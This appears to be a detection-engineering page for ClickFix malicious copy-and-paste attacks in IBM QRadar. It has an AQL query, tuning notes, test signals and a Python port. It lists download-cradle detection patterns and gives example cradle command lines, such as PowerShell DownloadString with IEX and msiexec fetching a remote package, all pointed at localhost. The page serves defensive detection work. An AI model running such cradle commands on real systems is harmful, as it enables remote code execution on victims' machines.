T1204.004 IBM QRadar · QRadar

Detect Malicious Copy and Paste in IBM QRadar

Adversaries may rely upon a user copying and pasting code to gain execution (ClickFix). Victims are presented with fake error messages, CAPTCHA prompts, or troubleshooting instructions on malicious websites or in phishing emails that instruct them to open a terminal, Windows Run dialog, or command prompt and paste a pre-supplied command. The pasted command typically includes download cradles, encoded payloads, or inline scripts designed to establish a foothold on the victim machine. ClickFix bypasses email filtering, browser sandboxing, and file execution controls because the user themselves executes the payload. Threat actors including Contagious Interview (DPRK-linked), Havoc C2 operators, and Lumma Stealer distribution campaigns have heavily leveraged this technique against enterprise users.

MITRE ATT&CK

Tactic: Execution
Technique: T1204 User Execution
Sub-technique: T1204.004 Malicious Copy and Paste
Canonical reference: https://attack.mitre.org/techniques/T1204/004/

QRadar Detection Query

IBM QRadar (QRadar), AQL:
SELECT
  DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS event_time,
  devicehostname AS hostname,
  username,
  CATEGORYNAME(category) AS event_category,
  QIDNAME(qid) AS event_name,
  UTF8(PAYLOAD) AS raw_payload,
  sourceip
FROM events
WHERE
  LOGSOURCETYPEID IN (12, 352)
  AND starttime > DATEADD('hour', -24, NOW())
  AND (
    (
      UTF8(PAYLOAD) ILIKE '%ParentImage%\\explorer.exe%'
      AND (
        UTF8(PAYLOAD) ILIKE '%Image%\\powershell.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\pwsh.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\cmd.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\mshta.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\wscript.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\cscript.exe%'
      )
    )
    OR (
      (
        UTF8(PAYLOAD) ILIKE '%ParentImage%\\chrome.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\firefox.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\msedge.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\iexplore.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\brave.exe%'
      )
      AND (
        UTF8(PAYLOAD) ILIKE '%Image%\\powershell.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\pwsh.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\cmd.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\mshta.exe%'
      )
    )
    OR (
      (
        UTF8(PAYLOAD) ILIKE '%Image%\\mshta.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\wscript.exe%'
      )
      AND (
        UTF8(PAYLOAD) ILIKE '%ParentImage%\\explorer.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\chrome.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\firefox.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\msedge.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\iexplore.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\brave.exe%'
      )
      AND (
        UTF8(PAYLOAD) ILIKE '%javascript:%'
        OR UTF8(PAYLOAD) ILIKE '%vbscript:%'
        OR UTF8(PAYLOAD) ILIKE '%http://%'
        OR UTF8(PAYLOAD) ILIKE '%https://%'
      )
    )
  )
  AND (
    UTF8(PAYLOAD) ILIKE '%DownloadString%'
    OR UTF8(PAYLOAD) ILIKE '%DownloadFile%'
    OR UTF8(PAYLOAD) ILIKE '%Net.WebClient%'
    OR UTF8(PAYLOAD) ILIKE '%Invoke-WebRequest%'
    OR UTF8(PAYLOAD) ILIKE '%certutil%urlcache%'
    OR UTF8(PAYLOAD) ILIKE '%bitsadmin%transfer%'
    OR UTF8(PAYLOAD) ILIKE '%-EncodedCommand%'
    OR UTF8(PAYLOAD) ILIKE '%FromBase64String%'
    OR UTF8(PAYLOAD) ILIKE '%Invoke-Expression%'
    OR UTF8(PAYLOAD) ILIKE '%IEX(%'
    OR UTF8(PAYLOAD) ILIKE '%javascript:%'
    OR UTF8(PAYLOAD) ILIKE '%vbscript:%'
    OR UTF8(PAYLOAD) ILIKE '%msiexec%http%'
    OR UTF8(PAYLOAD) ILIKE '%regsvr32%/i:http%'
  )
ORDER BY starttime DESC
LIMIT 500
Severity: high. Confidence: medium.

Detects ClickFix / Malicious Copy-Paste (T1204.004) via Sysmon Process Create events (Event ID 1) ingested into QRadar. The query requires one of three parent/child branches: (1) explorer.exe (the Windows Run dialog) spawning powershell.exe, pwsh.exe, cmd.exe, mshta.exe, wscript.exe or cscript.exe; (2) a browser process (chrome, firefox, msedge, iexplore, brave) spawning powershell.exe, pwsh.exe, cmd.exe or mshta.exe; or (3) mshta.exe or wscript.exe spawned by explorer.exe or a browser where the payload carries a javascript:, vbscript: or http(s) URL. Each branch is then ANDed with the cradle block, so the command line must also contain a download cradle (Net.WebClient, DownloadString/DownloadFile, Invoke-WebRequest, certutil urlcache, bitsadmin transfer, msiexec or regsvr32 fetching over HTTP), an encoded payload pattern (-EncodedCommand, FromBase64String), or inline execution (Invoke-Expression, IEX, javascript:, vbscript:). LOGSOURCETYPEID 12 targets Microsoft Windows Security Event Log; 352 targets Sysmon via Windows Event Forwarding. Note that the ILIKE patterns run over the whole UTF8(PAYLOAD) text, so a '%Image%\\...' pattern also matches inside the ParentImage field; if custom event properties for Image and ParentImage are defined, matching on those fields instead of the raw payload makes the rule stricter.

Data Sources

  • IBM QRadar SIEM with Microsoft Windows log source (Sysmon Event ID 1 via WEF or direct agent)
  • QRadar WinCollect agent collecting the Microsoft-Windows-Sysmon/Operational channel

Required Tables

events

False Positives & Tuning

  • Enterprise endpoint management tools (SCCM, Intune, Ansible) that invoke PowerShell with download cradles or encoded commands via system-level parent processes that inherit explorer.exe context during user-interactive sessions.
  • Developers running legitimate base64-encoded or download-based PowerShell scripts from browser-integrated development environments or web-based dashboards (e.g., Jenkins build agents, GitLab CI runner UI).
  • Security operations personnel executing Atomic Red Team, MITRE Caldera, or manual adversary simulation tests against endpoints during authorized purple team exercises.
  • Help desk or remote support tools (e.g., ConnectWise, TeamViewer) that spawn scripting interpreters under the user session parent hierarchy to execute diagnostic or remediation scripts.

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: ClickFix Run Dialog PowerShell Download Cradle Simulation

    Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing 'Net.WebClient', 'DownloadString', and 'IEX'. If executed via Win+R: ParentImage=explorer.exe, Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU containing the pasted command. Sysmon Event ID 3 (Network Connection) attempt to 127.0.0.1:8080 (connection refused, but event fires). PowerShell ScriptBlock Log Event ID 4104 with script content.

  2. Test 2: ClickFix mshta Inline JavaScript Execution

    Expected signal: Sysmon Event ID 1: Image=mshta.exe, CommandLine containing 'javascript:' and 'ActiveXObject' and 'WScript.Shell'. Sysmon Event ID 1 child: cmd.exe spawned by mshta.exe with CommandLine 'cmd.exe /c echo ClickFix-AtomicTest > ...'. Sysmon Event ID 11 (File Create): %TEMP%\clickfix_test.txt. If via Win+R: Sysmon Event ID 13 (Registry Value Set) on RunMRU key.

  3. Test 3: ClickFix Base64-Encoded PowerShell via Run Dialog

    Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing '-EncodedCommand dwBoAG8AYQBtAGkA'. If executed via Win+R: ParentImage=explorer.exe; Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU with the encoded command string. PowerShell ScriptBlock Log Event ID 4104 shows decoded content 'whoami'. The encoded value 'dwBoAG8AYQBtAGkA' decodes from UTF-16LE Base64 to 'whoami'.

  4. Test 4: ClickFix msiexec Remote Package Execution

    Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'msiexec /i https://'. Sysmon Event ID 1 child: msiexec.exe with CommandLine containing 'https://127.0.0.1:8443/clickfix-payload.msi' and '/qn'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8443 (will fail, no listener). If run via Win+R: Sysmon Event ID 13 on RunMRU key.
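The three parent/child branches and the cradle block of the AQL query above, plus the -EncodedCommand decoding described in Test 3, as an added Python example (a hypothetical port written for this page, not QRadar's or the page's own code). It runs over constructed Sysmon Event ID 1 payloads and parses them into fields rather than substring-matching the raw text, so it is stricter than the ILIKE patterns.

```python
import base64
import re

# Hypothetical Python port of the AQL branches above (not QRadar code). Parent/child
# pairings and cradle markers are copied from the query; matching is case-insensitive, like ILIKE.
EXPLORER = ("explorer.exe",)
BROWSERS = ("chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe", "brave.exe")
FROM_EXPLORER = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")
FROM_BROWSER = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
INLINE_MARKERS = ("javascript:", "vbscript:", "http://", "https://")
CRADLES = ("downloadstring", "downloadfile", "net.webclient", "invoke-webrequest", "-encodedcommand",
           "frombase64string", "invoke-expression", "iex(", "javascript:", "vbscript:")
# Ordered pairs mirror '%certutil%urlcache%'-style patterns: the first token must precede the second.
CRADLE_PAIRS = (("certutil", "urlcache"), ("bitsadmin", "transfer"), ("msiexec", "http"), ("regsvr32", "/i:http"))

def parse_sysmon(payload):
    """Split a flattened Sysmon Event ID 1 payload into its 'Key: Value' fields."""
    pairs = (line.partition(": ") for line in payload.splitlines())
    return {k: v.strip() for k, sep, v in pairs if sep and " " not in k}

def is_clickfix(payload):
    """True when one parent/child branch AND a cradle marker both hold. Stricter than the
    AQL: markers are checked in CommandLine only, not in the whole payload text."""
    f = parse_sysmon(payload)
    image = f.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = f.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = f.get("CommandLine", "").lower()
    branch = ((parent in EXPLORER and image in FROM_EXPLORER)
              or (parent in BROWSERS and image in FROM_BROWSER)
              or (image in ("mshta.exe", "wscript.exe") and parent in EXPLORER + BROWSERS
                  and any(m in cmd for m in INLINE_MARKERS)))
    cradle = (any(m in cmd for m in CRADLES)
              or any(a in cmd and b in cmd[cmd.index(a):] for a, b in CRADLE_PAIRS))
    return branch and cradle

def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand (Base64 of UTF-16LE); None if the switch is absent."""
    m = re.search(r"-encodedcommand\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None

# Constructed sample payloads (not real telemetry), trimmed to the fields the logic reads.
PS = "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n"
RUN = "ParentImage: C:\\Windows\\explorer.exe\n"
SAMPLES = {
    "run_dialog_cradle": PS + "CommandLine: powershell -w hidden -c \"IEX((New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/t'))\"\n" + RUN,
    "browser_mshta": "Image: C:\\Windows\\System32\\mshta.exe\nCommandLine: mshta javascript:close()\nParentImage: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\n",
    "run_dialog_encoded": PS + "CommandLine: powershell -EncodedCommand dwBoAG8AYQBtAGkA\n" + RUN,
    "benign_run_dialog": "Image: C:\\Windows\\System32\\cmd.exe\nCommandLine: cmd /c ipconfig /all\n" + RUN,
}

if __name__ == "__main__":
    print({name: is_clickfix(p) for name, p in SAMPLES.items()})
```

The benign Run-dialog sample shows why the cradle block matters: explorer.exe spawning cmd.exe alone is everyday activity and must not alert on its own.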
